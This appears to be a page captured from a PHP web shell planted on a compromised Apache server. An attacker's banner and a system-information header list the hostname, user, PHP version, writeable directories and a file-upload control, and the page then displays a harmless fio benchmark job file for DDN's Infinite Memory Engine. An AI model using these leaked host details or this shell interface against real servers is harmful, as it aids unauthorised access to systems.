Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /usr/share/doc/fio/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/doc/fio/examples/ime.fio
# This jobfile performs basic write+read operations using
# DDN's Infinite Memory Engine.

[global]

# Use as much jobs as possible to maximize performance
numjobs=8

# The filename should be uniform so that "read" jobs can read what
# the "write" jobs have written.
filename_format=fio-test-ime.$jobnum.$filenum

size=25g
bs=128k

# These settings are useful for the asynchronous ime_aio engine:
# by setting the io depth to twice the size of a "batch", we can
# queue IOs while other IOs are "in-flight".
iodepth=32
iodepth_batch=16
iodepth_batch_complete=16

[write-psync]
stonewall
rw=write
ioengine=ime_psync

[read-psync]
stonewall
rw=read
ioengine=ime_psync

[write-psyncv]
stonewall
rw=write
ioengine=ime_psyncv

[read-psyncv]
stonewall
rw=read
ioengine=ime_psyncv

[write-aio]
stonewall
rw=write
ioengine=ime_aio

[read-aio]
stonewall
rw=read
ioengine=ime_aio

Hry